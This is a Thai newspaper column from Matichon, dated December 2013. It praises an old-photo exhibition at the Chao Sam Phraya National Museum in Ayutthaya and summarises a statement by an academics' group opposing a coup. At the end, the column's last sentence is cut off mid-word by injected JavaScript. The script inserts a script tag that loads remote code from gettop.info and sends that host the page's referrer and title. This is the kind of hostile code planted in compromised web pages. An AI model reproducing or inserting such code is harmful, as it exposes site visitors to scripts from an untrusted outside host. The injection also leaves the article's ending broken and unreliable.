มติชนรายวัน ฉบับประจำวันจันทร์ที่ 16 ธันวาคม 2556

 

ภาพเก่าเล่าเรื่อง ที่อยุธยา

          พิพิธภัณฑสถานแห่งชาติ เจ้าสามพระยา ที่อยุธยา มีนิทรรศการภาพเก่าเล่าเรื่องอยุธยา

          รวบรวมจากเอกสารเก่าที่ทางการเก็บไว้ในคลังอย่างอดทนมานะพยายามยาวนาน โดย วิไลวรรณ ไกรสกุล (เจ้าหน้าที่ฝ่ายทะเบียนฯ ของพิพิธภัณฑ์ เจ้าสามพระยา)

          ภาพเก่าเล่าเรื่องอย่างนี้มีค่ามากกว่าตัวอักษรนับไม่ถ้วน เขียนพรรณนาบนแผ่นกระดาษนับจำนวนหน้ามิได้

          อธิบดีกรมศิลปากรควรพิมพ์ภาพเก่าเล่าเรื่องชุดนี้เป็นอัลบั้มเล่มบางๆ หรือทำโปสการ์ดขนาดต่างๆไว้บริการผู้เข้าชมพิพิธภัณฑ์ซื้อหาไปเป็นที่ระลึก หรือศึกษาประวัติศาสตร์สังคมวัฒนธรรม

          เท่ากับแบ่งปันเผยแพร่ข้อมูลข่าวสารสู่สาธารณะกว้างขวางและอย่างดีไปพร้อมกัน

          อยุธยา เป็นศูนย์กลางการค้านานาชาติในประวัติศาสตร์อาเซียนของอุษาคเนย์ ซึ่งพิพิธภัณฑ์ฯควรทำกิจกรรมแบ่งปันได้มากและดีกว่าที่ทำมา โดยเฉพาะเพลงดนตรีและการละเล่น

          ไม่ห้ามถ่ายรูปในพิพิธภัณฑ์ เจ้าสามพระยา และไม่คิดเงินค่าเข้าห้องน้ำ ฯลฯ เป็นเรื่องดีงามที่สุดของกิจการด้านมิวเซียมไทยในรอบเกือบร้อยปีที่ผ่านมา

          แต่แค่นี้ไม่พอ ต้องมีกิจกรรมแบ่งปันความรู้อย่างสม่ำเสมอมากกว่านี้อีก

นักวิชาการฝ่ายปกป้องประชาธิปไตย

          คงเห็นว่าในสื่อสาธารณะมีผู้ก่นประณามหยามเหยียดกลอนที่ผมเขียนต่อต้านการเรียกหาเผด็จการทำรัฐประหาร

          เขาจึงปริ๊นต์รายงานข่าวในเว็บประชาไทมาให้อ่าน เพราะรู้ว่าผมล้าหลังทางเทคโนโลยี แล้วไม่มีเครื่องมืออย่างนี้ ถึงมีก็ใช้ไม่เป็น

          จะตัดมาลงไว้เฉพาะใจความสำคัญ ดังนี้

          ชาญวิทย์ เกษตรศิริ เกษียร เตชะพีระ พวงทอง ภวัครพันธุ์ ธเนศ อาภรณ์สุวรรณ   วรเจตน์ ภาคีรัตน์ ปิยบุตร แสงกนกกุล และประจักษ์ ก้องกีรติ เป็นตัวแทนสมัชชาปกป้องประชาธิปไตย (สปป.) ก่อตั้งโดยเครือข่ายนักวิชาการกว่า 150 คน อ่านแถลงการณ์เมื่อวันอังคารที่ 10 ธันวาคม 2556

          โดยมีจุดร่วมเบื้องต้น คือ ไม่เห็นด้วยกับการนำสถาบันกษัตริย์มาเกี่ยวข้องกับการเมือง ไม่เห็นด้วยกับการที่ทหารแทรกแซงการเมือง รักษาและขยายพื้นที่สิทธิเสรีภาพ รักษาและขยายพื้นที่ประชาธิปไตย

          ทั้งนี้ สปป. แจ้งว่า ประชาชนที่สนใจและเห็นด้วยสามารถร่วมลงชื่อในแถลงการณ์ได้ที่แฟนเพจ สมัชชาปกป้องประชาธิปไตย (สปป.) 

          แถลงการณ์สมัชชาปกป้องประชาธิปไตยฉบับที่ 1 สรุปว่า

          “สมัชชาปกป้องประชาธิปไตย” ซึ่งเป็นการรวมตัวของนักวิชาการ และประชาชนหลากหลายอาชีพ ขอแถลงโต้แย้งประเด็นที่ กปปส. ที่ประชุมอธิการบดี (ทปอ.) และ นักวิชาการจำนวนหนึ่งที่นำเสนอความเห็นไปในทิศทางที่ขัดกับกติกาประชาธิปไตย ในภาวะวิกฤติของบ้านเมือง (มีรายละเอียดในเว็บประชาไท)

          ครูบาอาจารย์นักวิชาการในมหาวิทยาลัยที่ต่อต้านประชาธิปไตย ขอความกรุณาฟังเสียงข้างมากด้วย ไม่ใช่เอาเสียงข้างน้อยเป็นเครื่องชี้วัด แล้วชี้ขาดคนทั้งประเทศที่มีมากกว่า 50-60 ล้านdocument.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;